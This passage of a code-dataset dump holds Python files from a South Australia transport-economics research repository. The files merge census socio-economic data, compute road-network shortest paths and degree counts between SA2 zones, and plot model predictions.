age_df[' sa2_main16'].astype('str')\n\n# rename the columns\nrename_dic = {'p_tot_75_84_yrs':'percent_75_84_yrs',\n ' p_tot_35_44_yrs':'percent_35_44_yrs',\n ' p_tot_45_54_yrs':'percent_45_54_yrs',\n ' p_tot_25_34_yrs':'percent_25_34_yrs',\n ' p_tot_85ov':'percent_85ov_yrs',\n ' p_tot_65_74_yrs':'percent_65_74_yrs',\n ' p_tot_20_24_yrs':'percent_20_24_yrs',\n ' p_tot_15_19_yrs':'percent_15_19_yrs',\n ' p_tot_55_64_yrs':'percent_55_64_yrs',\n ' p_tot_tot':'total_pop',\n ' sa2_main16':'sa2_main16'}\n\n\nage_df.rename(columns=rename_dic, inplace=True)\n# note: average age = NaN or zero exists, because many zones don't have population..\n# useful variables: all.\n#endregion\n\n\n#region 3. 
read and edit gender and education dataframe\ngender_educ_df = pd.read_csv(raw_data_path + \"data_gender_educ.csv\")\nall_educ_df = pd.read_csv(raw_data_path + \"data_all_educ.csv\")\n\n#\ngender_educ_df[\" gender_tot_tot\"] = gender_educ_df[\" m_tot_tot\"] + gender_educ_df[\" f_tot_tot\"]\n\nfor col in ['m_tot_75_84_yr', ' m_adv_dip_dip_total', ' m_tot_35_44_yr',\n ' m_tot_55_64_yr', ' f_b_deg_tot', ' m_tot_85_yr_over',\n ' f_tot_55_64_yr', ' f_cer_tot_tot', ' f_tot_65_74_yr',\n ' f_tot_15_24_yr', ' m_grad_dip_cer_tot',\n ' f_tot_75_84_yr', ' f_tot_45_54_yr', ' m_tot_45_54_yr',\n ' f_adv_dip_dip_total', ' f_tot_35_44_yr', ' m_tot_25_34_yr',\n ' m_pg_deg_tot', ' m_tot_65_74_yr', ' m_tot_15_24_yr',\n ' f_pguate_deg_tot', ' m_b_deg_tot', ' m_cer_tot_tot',\n ' f_tot_25_34_yr', ' f_grad_dip_cer_tot',\n ' f_tot_85_yr_over']:\n g = col.split(\"_\")[0]\n if g in {\" m\", \"m\"}:\n gender_educ_df[col] = gender_educ_df[col] / gender_educ_df[\" m_tot_tot\"]\n else:\n gender_educ_df[col] = gender_educ_df[col] / gender_educ_df[\" f_tot_tot\"]\n\ngender_educ_df[\"male_percent\"] = gender_educ_df[\" m_tot_tot\"]/gender_educ_df[\" gender_tot_tot\"]\ngender_educ_df[\"female_percent\"] = gender_educ_df[\" f_tot_tot\"]/gender_educ_df[\" gender_tot_tot\"]\n\n# edit sa2_main var\nhelper = [str(elt) for elt in gender_educ_df[\" sa2_main16\"].values]\ngender_educ_df[\"SA2_MAIN16\"] = helper\n\n#\nall_educ_df['bachelor_degree_percent'] = all_educ_df[' p_b_deg_tot']/all_educ_df[' p_tot_tot']\nall_educ_df['master_degree_percent'] = all_educ_df[' p_grad_dip_cer_tot']/all_educ_df[' p_tot_tot']\n\n#\nall_educ_df.rename(columns={' sa2_main16':'sa2_main16'},inplace=True)\n\n#\nall_educ_df['sa2_main16']=all_educ_df['sa2_main16'].astype('str')\n\n#\ngender_educ_df = gender_educ_df[['SA2_MAIN16', 'male_percent', 'female_percent']]\nall_educ_df = all_educ_df[['sa2_main16', 'bachelor_degree_percent', 'master_degree_percent']]\n#endregion\n\n\n#region 4. read and edit indigenous social variables\nindigenous_social_df = pd.read_csv(raw_data_path + \"data_indigenous.csv\")\n\n# replace names\nrename_dic = {'perc_indig_age_0_14':'perc_indig_age_0_14',\n ' perc_indig_hsld_equiv_inc_less_than_300':'perc_indig_hsld_equiv_inc_less_than_300',\n ' perc_indig_rent_oth_dwl':'perc_indig_rent_oth_dwl',\n ' perc_indig_no_vehicle_in_hsld':'perc_indig_no_vehicle_in_hsld',\n ' perc_indig_age_65_over':'perc_indig_age_65_over',\n ' perc_indig_rent_priv_dwl':'perc_indig_rent_priv_dwl',\n ' perc_indig_rent_pub_dwl':'perc_indig_rent_pub_dwl',\n ' perc_indig_f':'perc_indig_f',\n ' perc_indig_owned_outright_dwl':'perc_indig_owned_outright_dwl',\n ' perc_indig_age_35_64':'perc_indig_age_35_64',\n ' perc_indig_age_15plus_edu_degree_diploma_certificate':'perc_indig_age_15plus_edu_degree_diploma_certificate',\n ' perc_indig_hsld_equiv_inc_1000_1500':'perc_indig_hsld_equiv_inc_1000_1500',\n ' perc_indig_1_or_more_vehicle_in_hsld':'perc_indig_1_or_more_vehicle_in_hsld',\n ' perc_indig_hsld_equiv_inc_above_1500':'perc_indig_hsld_equiv_inc_above_1500',\n ' perc_indig_hsld_equiv_inc_300_1000':'perc_indig_hsld_equiv_inc_300_1000',\n ' sa2_code16':'sa2_code16',\n ' perc_indig_m':'perc_indig_m',\n ' perc_indig_age_15_34':'perc_indig_age_15_34',\n ' perc_indig_age_15plus_edu_none':'perc_indig_age_15plus_edu_none'}\n\nindigenous_social_df.rename(columns=rename_dic,inplace=True)\n\nindigenous_social_df['sa2_code16']=indigenous_social_df['sa2_code16'].astype('str')\n\n# print(indigenous_social_df.shape)\n#endregion\n\n\n#region 5. 
Other socio economic variables\necon_df = pd.read_csv(raw_data_path+'social_econ_indicators.csv')\nunemployment_rate_df = pd.read_csv(raw_data_path+'data_unemployment_rate.csv')\n\n#\nrename_dic = {'pov_rt_exc_hc_syn':'poverty_rate_1',\n ' housestrs_syn': 'hh_finance_stress',\n ' equivinc_median_syn':'equivinc_median_syn',\n ' pov_rt_syn':'poverty_rate_2',\n ' inc_median_syn':'median_inc',\n ' gini_syn':'gini',\n ' sa2_code16': 'sa2_code16'}\necon_df.rename(columns=rename_dic,inplace=True)\necon_df['sa2_code16']=econ_df['sa2_code16'].astype('str')\n\n\n#\nrename_dic = {'unemployment_rate':'unemployment_rate',\n ' sa2_code16': 'sa2_code16'}\nunemployment_rate_df.rename(columns=rename_dic,inplace=True)\nunemployment_rate_df['sa2_code16']=unemployment_rate_df['sa2_code16'].astype('str')\n\n#endregion\n\n\n\n\n#region 6. merge all socio-economic variables\n# jobs_all, jobs_industries, age_df, gender_educ_df, all_educ_df, indigenous_social_df\n# print(jobs_all.columns) # sa2_code16\n# print(jobs_all.shape)\n# print(jobs_industries.columns) # sa2_code16\n# print(jobs_industries.shape)\n# print(age_df.columns) # sa2_main16\n# print(age_df.shape)\n# print(gender_educ_df.columns) # SA2_MAIN16\n# print(gender_educ_df.shape)\n# print(all_educ_df.columns) # sa2_main16\n# print(all_educ_df.shape)\n# print(indigenous_social_df.columns) # sa2_code16\n# print(indigenous_social_df.shape)\n\nsocio_econ_df = jobs_all.merge(jobs_industries, on='sa2_code16', suffixes=(\"\",\"_y\"))\nsocio_econ_df = socio_econ_df.merge(age_df, left_on='sa2_code16', right_on='sa2_main16')\nsocio_econ_df = socio_econ_df.merge(gender_educ_df, left_on='sa2_code16', right_on='SA2_MAIN16')\nsocio_econ_df = socio_econ_df.merge(all_educ_df, left_on='sa2_code16', right_on='sa2_main16')\nsocio_econ_df = socio_econ_df.merge(indigenous_social_df, on='sa2_code16', suffixes=(\"\",\"_z\"))\nsocio_econ_df = socio_econ_df.merge(econ_df, on='sa2_code16', suffixes=(\"\",\"_drop\"))\nsocio_econ_df = socio_econ_df.merge(unemployment_rate_df, on='sa2_code16', suffixes=(\"\",\"_drop\"))\n\nprint(socio_econ_df.shape)\nprint(socio_econ_df.columns)\n#endregion\n\n\n# save files\nsocio_econ_df.to_pickle(intermediate_data_path+'sa2_node_with_socio_econ_df.pickle') # Pycharm code\n# socio_econ_df.to_pickle('../data/socio_econ_df.pickle') # command line code.\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.627790629863739,
"alphanum_fraction": 0.6339492201805115,
"avg_line_length": 40.870967864990234,
"blob_id": "d29da0cf998ef7d80c0ed4595aa2ad40cb18e45e",
"content_id": "a7c0ca8444d433ecc87202704ee63cddcbda2ef8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2598,
"license_type": "permissive",
"max_line_length": 145,
"num_lines": 62,
"path": "/src/d06_visualization/visualize_pred_real.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "# evaluate the models by plotting real vs. predicted values\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport pickle\nimport statsmodels.api as sm\nfrom sklearn.linear_model import LassoCV\nfrom sklearn.preprocessing import normalize\nfrom sklearn import linear_model\n\n# system path\nimport sys\nimport os\n\n# util path\nutility_path = os.path.join(os.getcwd(),'src/d00_utils/')\nsys.path.append(utility_path)\nimport utilities as util\n\n# path\nprocessing_data_path = os.path.join(os.getcwd(),'data/03_processed/')\nmodel_path = os.path.join(os.getcwd(),'data/04_models/')\nmodel_output_path = os.path.join(os.getcwd(),'data/05_model_outputs/')\nreport_path = os.path.join(os.getcwd(),'data/06_reporting/')\n\n\n# read data\nwith open(processing_data_path+'node_df.pickle', 'rb') as f:\n node_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_consumption_df.pickle', 'rb') as f:\n edge_consumption_df = pickle.load(f)\n\nwith open(processing_data_path+'edge_flow_df.pickle', 'rb') as f:\n edge_flow_df = pickle.load(f) # more observations\n\n\n###########################################################################################\n# Visualize predicted vs. real outputs\n###########################################################################################\n# format: saved model name: (picture title, figure name, dataframe).\nmodel_list_to_read_dic = {'model1_list_od_duration': ('Travel time (origin to destination)', 'pred_travel_time', edge_flow_df),\n 'model2_list_consumption_amount_mcc_source': ('Amount of consumption', 'pred_consumption_amount', edge_consumption_df),\n 'model2_list_consumption_count_mcc_source': ('Counts of consumption', 'pred_consumption_count', edge_consumption_df),\n 'model2_list_flow_agents': ('Flow of people', 'pred_flow', edge_flow_df),\n 'model3_list_median_income_per_job_aud_persons': ('Median income', 'pred_inc', node_df)\n }\n\nfor model_pickle_name in model_list_to_read_dic.keys():\n with open(model_path + model_pickle_name + '.pickle', 'rb') as f:\n model_list = pickle.load(f)\n\n # get picture title, fig_name, and dataframe\n picture_title, fig_name, df = model_list_to_read_dic[model_pickle_name]\n\n # obtain y_name, x_name, and saved model\n _, (y_name, x_name), model = model_list[-1]\n\n # plot the observed vs. predicted values.\n util.plot_observed_predicted(df, y_name, x_name, model, report_path+'model_visual_pred_actual/', picture_title, fig_name)\n\n\n"
},
{
"alpha_fraction": 0.5538636445999146,
"alphanum_fraction": 0.5767381191253662,
"avg_line_length": 42.97503662109375,
"blob_id": "f50e49bae37087aa4148089c453cd614c9061431",
"content_id": "66443b1b121f081c660400b1a7ffeb1503d0d5e5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 29946,
"license_type": "permissive",
"max_line_length": 213,
"num_lines": 681,
"path": "/notebooks/jason/shp_process.py",
"repo_name": "cjsyzwsh/South_Australia_Transport_Econ",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport geopandas as gpd\nimport geoplot\nfrom pysal.lib import weights\nimport networkx as nx\nfrom scipy.spatial import distance\nimport momepy\nimport pickle\nimport math\nimport sys\n\ndef shortest_path(shp_file):\n \"\"\"\n Inputs:\n shp_file - a shp file\n Outputs:\n A dictionary that maps (o,d) pairs to its shortest path\n \"\"\"\n \n print(\"=====Running shortest_path=====\")\n \n #convert to austrailia projection\n shp_file_proj = shp_file.to_crs(\"epsg:3112\")\n # Step 1. Queen net\n shp_file_queen = weights.contiguity.Queen.from_dataframe(shp_file)\n \n # Step 2. Kernel net with the right euclidean weighting\n #Use all K nearest neighbors\n shp_file_kernel = weights.distance.Kernel.from_dataframe(shp_file_proj, k = shp_file_queen.n - 1)\n # turn the defaults to euclidean distances as weights.\n for i in shp_file_kernel.neighbors.keys():\n for j_idx in range(len(shp_file_kernel.neighbors[i])):\n j = shp_file_kernel.neighbors[i][j_idx]\n # note that kw.weights indices are \n # i (node index), j_idx (index of the node on the list - not node index!)\n weight = shp_file_kernel.weights[i][j_idx]\n distance = (1 - weight)*shp_file_kernel.bandwidth[i]\n shp_file_kernel.weights[i][j_idx] = distance[0]\n \n # Step 3. assign euclidean weights to Queen net\n for o in shp_file_queen.neighbors.keys():\n for d_idx in range(len(shp_file_queen.neighbors[o])):\n d = shp_file_queen.neighbors[o][d_idx] # return the o and d SA2 original indices. \n weight = shp_file_kernel[o][d] # get the kernel weight associated with the o and d.\n shp_file_queen.weights[o][d_idx] = weight\n \n \n # create the queen network in nx\n shp_file_nx = shp_file_queen.to_networkx()\n\n # assign weights to adelaide_nx\n for o,d in shp_file_nx.edges:\n shp_file_nx.edges[o,d]['weight'] = shp_file_queen[o][d]\n\n # example weight between nodes 0 and 1.\n shp_file_nx.get_edge_data(0, 1)\n \n # full paths.\n # return: (node, (distance, path))\n path=dict(nx.all_pairs_dijkstra(shp_file_nx, weight='weight'))\n \n # create a OD dictionary.\n OD_full_path = {}\n\n for o in range(110):\n for d in range(110):\n if d==103 or o==103: # note that 103 is the island - this is no path to it.\n pass\n else:\n OD_full_path[(o,d)] = path[o][1][d]\n \n print(\"=====DONE shortest_path=====\") \n \n return OD_full_path\n\ndef process_road_shp(road_file):\n \"\"\"\n Input: road_file -- for example: gpd.read_file(mount_path + \"/SA data/dataSA/roads/Roads_GDA2020.shp\")\n \n Output: cleaned road.shp file\n \n \"\"\"\n sa2_roads = road_file.loc[~road_file['class'].isna(),]\n \n return sa2_roads\n\ndef union_road_land_shp(shp, road_shp):\n \"\"\"\n Inputs:\n shp - a shp file\n road_shp - the shp file containing road information\n Outputs:\n A shp file with all the information merged\n \"\"\"\n \n print(\"=====Running union_road_land_shp=====\")\n \n # crs and projection\n shp_proj = shp.to_crs(\"epsg:3112\")\n sa2_roads_proj = road_shp.to_crs(\"epsg:3112\")\n\n \n # create the centroids for roads\n road_centroid = sa2_roads_proj.centroid\n \n # attach SA2 idx to road networks\n sa2_roads_proj['SA2_loc'] = -1 # init as -1.\n\n for SA2_idx in range(shp_proj.shape[0]):\n # assign SA2_idx to the road network\n within_logic = road_centroid.within(shp_proj.loc[SA2_idx, 'geometry'])\n sa2_roads_proj.loc[within_logic, 'SA2_loc'] = SA2_idx\n \n # Use only the 'class' variable for now. 
\n sa2_roads_class_proj = sa2_roads_proj[['class', 'geometry', 'SA2_loc']]\n sa2_roads_class_proj_dummies = pd.get_dummies(sa2_roads_class_proj)\n \n \n # aggregate the road attribute dummies for SA2.\n sa2_roads_class_proj_dummies = sa2_roads_class_proj_dummies.loc[sa2_roads_class_proj_dummies['SA2_loc'] > -1]\n sa2_road_class_agg=sa2_roads_class_proj_dummies.groupby(by='SA2_loc').sum()\n \n # augment road class variables to SA2_network.\n shp_proj = shp_proj.merge(sa2_road_class_agg, how='inner', left_index=True, right_index=True)\n \n print(\"=====DONE union_road_land_shp=====\")\n \n return shp_proj, sa2_roads_proj\n\ndef get_degree_df(shp_proj, road_proj):\n \"\"\"\n Inputs:\n shp_proj - a shp projection merged with road info; the first output union_road_land_shp(shp, road_shp)\n road_proj - a shp projection that has only road information; the second output of union_road_land_shp(shp, road_shp)\n Outputs:\n degree_df - a df with SA2 code and its degree counts\n node_degree_df - a pickle file with the shp file information + node degree counts\n edge_degree_df - a pickle file with the shp file information + agg node degree counts of the shortest path\n \"\"\"\n \n print(\"=====Running get_degree_df=====\")\n \n \n #get counts\n count ={}\n for elt in road_proj[\"SA2_loc\"]:\n if elt in count:\n count[elt] += 1\n else:\n count[elt] = 1\n SA_idxs = sorted((key,count[key]) for key in count)\n \n \n sa_idx_to_graph = {}\n for sa_idx,c in SA_idxs[1:]:\n within = road_proj[road_proj[\"SA2_loc\"]==sa_idx]\n graph = momepy.gdf_to_nx(within, approach='primal')\n sa_idx_to_graph[sa_idx] = graph\n \n \n degree_df = pd.DataFrame(columns=[\"SA2_MAIN16\", \"num_nodes\", \n \"num_1degree\", \"num_2degree\", \n \"num_3degree\", \"num_4degree\", \n \"num_greater5degree\"])\n \n for sa_idx in sa_idx_to_graph:\n g = sa_idx_to_graph[sa_idx]\n degree = dict(nx.degree(g))\n nx.set_node_attributes(g, degree, 'degree')\n g = momepy.node_degree(g, name='degree')\n node_df, edge_df, sw = momepy.nx_to_gdf(g, points=True, lines=True,\n spatial_weights=True)\n\n SA2_MAIN16 = shp_proj.iloc[sa_idx][\"SA2_MAIN16\"]\n #nodes is intersections\n num_nodes = len(node_df)\n #num_0degree = len(node_df[node_df[\"degree\"]==0])\n num_1degree = len(node_df[node_df[\"degree\"]==1])\n num_2degree = len(node_df[node_df[\"degree\"]==2])\n num_3degree = len(node_df[node_df[\"degree\"]==3])\n num_4degree = len(node_df[node_df[\"degree\"]==4])\n num_greater5degree = len(node_df[node_df[\"degree\"]>=5])\n degree_df = degree_df.append({\"SA2_MAIN16\": SA2_MAIN16, \"num_nodes\":num_nodes, \n \"num_1degree\":num_1degree, \"num_2degree\":num_2degree, \"num_3degree\":num_3degree,\n \"num_4degree\":num_4degree,\n \"num_greater5degree\":num_greater5degree},\n ignore_index=True)\n \n print(\"=====DONE degree df=====\")\n \n return degree_df\n\ndef get_specific_df(OD_full_path, shp, shp_proj, mount_path, sa4_set=['401','402','403','404']):\n \"\"\"\n Inputs:\n OD_full_path - output from shortest_path(); the first output union_road_land_shp(shp, road_shp)\n shp - original shp file\n shp_proj - the shp file merged with road attributes \n \n Outputs:\n edge_specific_df - initial edge df with all info\n node_specific_df - intial node df with all info\n \"\"\"\n \n print(\"=====Running get_specific_df=====\")\n \n # read google api info\n with open(mount_path + '/SA data/dataSA/OD_Google_API_raw.pickle', 'rb') as w:\n OD_google_raw = pickle.load(w)\n\n with open(mount_path + '/SA data/dataSA/OD_Google_API_With_Map_Info.pickle', 'rb') as w:\n 
OD_google_with_map = pickle.load(w)\n \n jobs_all_sub = jobs_all[['num_jobs_000_persons', 'sa2_code16', 'median_income_per_job_aud_persons']]\n \n flow_adelaide_df = flow_df.loc[np.array([x[:3] in sa4_set for x in flow_df.agent_home_sa2])]\n flow_adelaide_df = flow_adelaide_df.loc[np.array([x[:3] in sa4_set for x in flow_adelaide_df.sa2])]\n \n flow_adelaide_df.rename(columns={'agent_home_sa2':'origin','sa2':'destination'}, inplace=True)\n flow_adelaide_df['OD'] = ''\n flow_adelaide_df['OD'] = flow_adelaide_df['origin'] + flow_adelaide_df['destination']\n flow_adelaide_df.groupby(by='OD').sum() # no repetition. \n \n # reindex\n flow_adelaide_df.index = np.arange(flow_adelaide_df.shape[0])\n \n # create ten columns here.\n road_attribute_names_list = ['class_ART', 'class_BUS', 'class_COLL',\n 'class_FREE', 'class_HWY', 'class_LOCL', 'class_SUBA', 'class_TRK2',\n 'class_TRK4', 'class_UND']\n flow_adelaide_df[road_attribute_names_list] = 0.0\n \n \n # add the road attributes on the shortest path to the flow_adelaide_df.\n # time cost: 3-5 mins?\n for idx in np.arange(flow_adelaide_df.shape[0]):\n origin = flow_adelaide_df.loc[idx, 'origin']\n destination = flow_adelaide_df.loc[idx, 'destination']\n o_idx = shp.index[shp.SA2_MAIN16==origin].tolist()[0]\n d_idx = shp.index[shp.SA2_MAIN16==destination].tolist()[0]\n #print(o_idx,d_idx)\n\n try:\n # OD_full_path might not have all the shortest path...\n idx_list_on_shortest_path = OD_full_path[(o_idx, d_idx)]\n for node_on_shortest_path in idx_list_on_shortest_path:\n flow_adelaide_df.loc[idx, road_attribute_names_list] += shp_proj.loc[node_on_shortest_path, road_attribute_names_list] \n except KeyError as error:\n pass\n \n \n # add the job information to flow dataframe.\n # origin\n flow_adelaide_df=flow_adelaide_df.merge(jobs_all_sub, left_on='origin', right_on='sa2_code16', how = 'left')\n flow_adelaide_df=flow_adelaide_df.rename(columns={'num_jobs_000_persons':'num_jobs_000_persons_origin', 'median_income_per_job_aud_persons':'median_income_per_job_aud_origin'})\n\n # destination\n flow_adelaide_df=flow_adelaide_df.merge(jobs_all_sub, left_on='destination', right_on='sa2_code16', how = 'left')\n flow_adelaide_df=flow_adelaide_df.rename(columns={'num_jobs_000_persons':'num_jobs_000_persons_destination', 'median_income_per_job_aud_persons':'median_income_per_job_aud_destination'})\n\n \n # augment the travel time and distance information to flow_adelaide_df\n flow_adelaide_df['od_duration_value']=0.0 \n flow_adelaide_df['od_distance_value']=0.0 \n\n for idx in range(flow_adelaide_df.shape[0]):\n if idx%100 == 0:\n print(idx)\n\n # idx is the index in flow_adelaide_df\n origin_sa2_idx = flow_adelaide_df.loc[idx,'origin']\n destination_sa2_idx = flow_adelaide_df.loc[idx,'destination']\n\n # return the corresponding idx from OD_Google_API\n filter_idx = np.multiply(OD_google_with_map.loc[:, 'o_sa2_idx'] == origin_sa2_idx,\n OD_google_with_map.loc[:, 'd_sa2_idx'] == destination_sa2_idx)\n idx_google_api = OD_google_with_map.index[filter_idx].tolist()[0] # this is the index in OD_google_with_map\n\n # \n flow_adelaide_df.loc[idx, 'od_duration_value'] = OD_google_with_map.loc[idx_google_api, 'od_duration_value']\n flow_adelaide_df.loc[idx, 'od_distance_value'] = OD_google_with_map.loc[idx_google_api, 'od_distance_value']\n \n # replace 0.0 values by 1.0\n cols = ['sum_stay_duration','unique_agents','total_stays',\n 'class_ART', 'class_BUS', 'class_COLL', 'class_FREE', 'class_HWY', 'class_LOCL', \n 'class_SUBA', 'class_TRK2', 'class_TRK4', 
'class_UND',\n 'od_duration_value', 'od_distance_value']\n\n for col in cols:\n flow_adelaide_df.loc[flow_adelaide_df.loc[:,col] == 0.0, col] = 1.0\n \n # dropped 433 observations. The df has nan.\n flow_adelaide_df.dropna(how = 'any', inplace = True)\n \n # add total road count as a variable\n flow_adelaide_df['road_counts'] = np.sum(flow_adelaide_df[['class_ART', 'class_BUS', 'class_COLL', 'class_FREE', 'class_HWY', 'class_LOCL', \n 'class_SUBA', 'class_TRK2', 'class_TRK4', 'class_UND']], axis = 1)\n edge_specific_df = flow_adelaide_df.copy()\n \n print(\"=====DONE EDGE=====\")\n \n # origin and destination flow counts\n origin_flow_counts = flow_adelaide_df.groupby(by=\"origin\",as_index=False,sort=False).sum()[['origin','unique_agents','sum_stay_duration','total_stays']]\n destination_flow_counts = flow_adelaide_df.groupby(by=\"destination\",as_index=False,sort=False).sum()[['destination','unique_agents','sum_stay_duration','total_stays']]\n \n # compute origin and destination entropy (w.r.t. location). flow location diversity.\n # origin\n origin_flow_count_n = flow_adelaide_df.groupby('origin')[['unique_agents','sum_stay_duration','total_stays']].transform('sum')\n values = flow_adelaide_df[['unique_agents','sum_stay_duration','total_stays']]/origin_flow_count_n\n flow_adelaide_df[['unique_agents_origin_entropy','sum_stay_duration_origin_entropy','total_stays_origin_entropy']] = \\\n -(values*np.log(values))\n origin_flow_entropy=flow_adelaide_df.groupby('origin',as_index=False,sort=False)[['unique_agents_origin_entropy','sum_stay_duration_origin_entropy','total_stays_origin_entropy']].sum()\n\n # destination\n destination_flow_count_n = flow_adelaide_df.groupby('destination')[['unique_agents','sum_stay_duration','total_stays']].transform('sum')\n values = flow_adelaide_df[['unique_agents','sum_stay_duration','total_stays']]/destination_flow_count_n\n flow_adelaide_df[['unique_agents_destination_entropy','sum_stay_duration_destination_entropy','total_stays_destination_entropy']] = \\\n -(values*np.log(values))\n destination_flow_entropy=flow_adelaide_df.groupby('destination',as_index=False,sort=False)[['unique_agents_destination_entropy','sum_stay_duration_destination_entropy','total_stays_destination_entropy']].sum()\n\n # merge data to sa2_adelaide_road_proj\n # augment income and jobs\n sa2_data_prep=pd.merge(shp_proj, jobs_all_sub, left_on='SA2_MAIN16', right_on='sa2_code16', how = 'inner')\n sa2_data_prep=pd.merge(sa2_data_prep, origin_flow_counts, left_on='SA2_MAIN16', right_on='origin', how='inner', suffixes=[None,'_origin_counts'])\n sa2_data_prep=pd.merge(sa2_data_prep, destination_flow_counts, left_on='SA2_MAIN16', right_on='destination', how='inner', suffixes=[None,'_destination_counts'])\n sa2_data_prep=pd.merge(sa2_data_prep, origin_flow_entropy, left_on='SA2_MAIN16', right_on='origin', how='inner')\n sa2_data_prep=pd.merge(sa2_data_prep, destination_flow_entropy, left_on='SA2_MAIN16', right_on='destination', how='inner')\n\n # rename the '_origin_counts'\n sa2_data_prep = sa2_data_prep.rename(columns={'unique_agents':'unique_agents_origin_counts',\n 'sum_stay_duration':'sum_stay_duration_origin_counts',\n 'total_stays':'total_stays_origin_counts'})\n \n node_specific_df = sa2_data_prep.copy()\n \n print(\"=====DONE get_specific_df=====\")\n \n return edge_specific_df, node_specific_df\n\ndef union_degree(node_df, edge_df, degree_df, OD_full_path):\n \"\"\"\n Inputs:\n node_df, edge_df - the node and edge specific df from get_specific_df\n OD_full_path - output of 
shortest_path\n degree_df - output of get degree df\n Outputs:\n edge_degree_df, node_degree_df - respective dfs merged with degree df\n \"\"\"\n \n print(\"=====Running union_degree=====\")\n \n node_degree_df = node_df.merge(degree_df, how=\"left\", on=\"SA2_MAIN16\")\n \n origin_dest = list(zip(edge_df[\"origin\"].values, edge_df[\"destination\"].values))\n \n edge_degree_df = pd.DataFrame(columns=[\"sa2_code16_x\", \"sa2_code16_y\", \"num_nodes_x\", \n \"num_1degree_x\", \"num_2degree_x\", \"num_3degree_x\", \"num_4degree_x\",\n \"num_greater5degree_x\",\n \"num_nodes_y\", \n \"num_1degree_y\", \"num_2degree_y\", \"num_3degree_y\", \"num_4degree_y\",\n \"num_greater5degree_y\"])\n \n sa_to_i = {}\n i_to_sa = {}\n sa_to_data = {}\n for i, row in degree_df.iterrows():\n print(i)\n i_to_sa[i] = row[\"SA2_MAIN16\"]\n sa_to_i[row[\"SA2_MAIN16\"]] = i\n sa_to_data[row[\"SA2_MAIN16\"]] = row[['num_nodes', 'num_1degree','num_2degree', 'num_3degree', 'num_4degree', 'num_greater5degree']]\n \n for o,d in origin_dest:\n if o != d:\n o_data = degree_df[degree_df[\"SA2_MAIN16\"]==o]\n d_data = degree_df[degree_df[\"SA2_MAIN16\"]==d]\n\n num_nodes_pth = 0\n num_1degree_pth = 0\n num_2degree_pth = 0\n num_3degree_pth = 0\n num_4degree_pth = 0\n num_greater5degree_pth = 0\n oid = sa_to_i[o]\n did = sa_to_i[d]\n for i in OD_full_path[(oid,did)]:\n sa = i_to_sa[i]\n num_nodes_pth += float(sa_to_data[sa][0])\n num_1degree_pth += float(sa_to_data[sa][1])\n num_2degree_pth += float(sa_to_data[sa][2])\n num_3degree_pth += float(sa_to_data[sa][3])\n num_4degree_pth += float(sa_to_data[sa][4])\n num_greater5degree_pth += float(sa_to_data[sa][5])\n\n\n\n num_nodes_x = float(o_data[\"num_nodes\"].iloc[0])\n num_1degree_x = float(o_data[\"num_1degree\"].iloc[0])\n num_2degree_x = float(o_data[\"num_2degree\"].iloc[0])\n num_3degree_x = float(o_data[\"num_3degree\"].iloc[0])\n num_4degree_x = float(o_data[\"num_4degree\"].iloc[0])\n num_greater5degree_x = float(o_data[\"num_greater5degree\"].iloc[0])\n\n num_nodes_y = float(d_data[\"num_nodes\"].iloc[0])\n num_1degree_y = float(d_data[\"num_1degree\"].iloc[0])\n num_2degree_y = float(d_data[\"num_2degree\"].iloc[0])\n num_3degree_y = float(d_data[\"num_3degree\"].iloc[0])\n num_4degree_y = float(d_data[\"num_4degree\"].iloc[0])\n num_greater5degree_y = float(d_data[\"num_greater5degree\"].iloc[0])\n\n\n else:\n o_data = degree_df[degree_df[\"SA2_MAIN16\"]==o]\n d_data = degree_df[degree_df[\"SA2_MAIN16\"]==d]\n num_nodes_x = num_nodes_y = num_nodes_pth = float(o_data[\"num_nodes\"].iloc[0])\n num_1degree_x = num_1degree_y = num_1degree_pth = float(o_data[\"num_1degree\"].iloc[0])\n num_2degree_x = num_2degree_y = num_2degree_pth = float(o_data[\"num_2degree\"].iloc[0])\n num_3degree_x = num_3degree_y = num_3degree_pth = float(o_data[\"num_3degree\"].iloc[0])\n num_4degree_x = num_4degree_y = num_4degree_pth = float(o_data[\"num_4degree\"].iloc[0])\n num_greater5degree_x = num_greater5degree_y = num_greater5degree_pth = float(o_data[\"num_greater5degree\"].iloc[0])\n\n edge_degree_df = edge_degree_df.append({\"sa2_code16_x\": o, \"sa2_code16_y\":d ,\"num_nodes_x\":num_nodes_x, \n \"num_1degree_x\":num_1degree_x, \"num_2degree_x\":num_2degree_x, \n \"num_3degree_x\":num_3degree_x, \"num_4degree_x\":num_4degree_x,\n \"num_greater5degree_x\":num_greater5degree_x,\n \"num_nodes_y\":num_nodes_y, \n \"num_1degree_y\":num_1degree_y, \"num_2degree_y\":num_2degree_y, \n \"num_3degree_y\":num_3degree_y, \"num_4degree_y\":num_4degree_y,\n 
\"num_greater5degree_y\":num_greater5degree_y,\n \"num_nodes_pth\":num_nodes_pth,\n \"num_1degree_pth\":num_1degree_pth,\n \"num_2degree_pth\":num_2degree_pth,\n \"num_3degree_pth\":num_3degree_pth,\n \"num_4degree_pth\":num_4degree_pth,\n \"num_greater5degree_pth\":num_greater5degree_pth },\n ignore_index=True)\n edge_degree_df = edge_df.merge(edge_degree_df, how=\"left\", on=[\"sa2_code16_x\",\"sa2_code16_y\"])\n \n print(\"=====DONE union_degree=====\")\n \n return edge_degree_df, node_degree_df\n\ndef union_poi(node_degree_df, edge_degree_df):\n \"\"\"\n Inputs:\n node_degree_df, edge_degree_df - outputs of union degree\n Outputs:\n Inputs merged with poi df\n \"\"\"\n \n print(\"=====Running union_poi=====\")\n \n \n# poi_df = pd.read_pickle(\"../../data_process/poi_df.pickle\")\n# sa_codes_poi = []\n# for i, centroid in enumerate(poi_df.geometry):\n# if i%100 == 0: print(i)\n# found = False\n# for i, row in sa2_south_au.iterrows():\n# if row[\"geometry\"].contains(centroid):\n# sa_codes_poi.append(row[\"SA2_MAIN16\"])\n# found = True\n# break\n# if not found:\n# sa_codes_poi.append(\"0\")\n# poi_df[\"SA2_MAIN16\"] = sa_codes_poi\n# 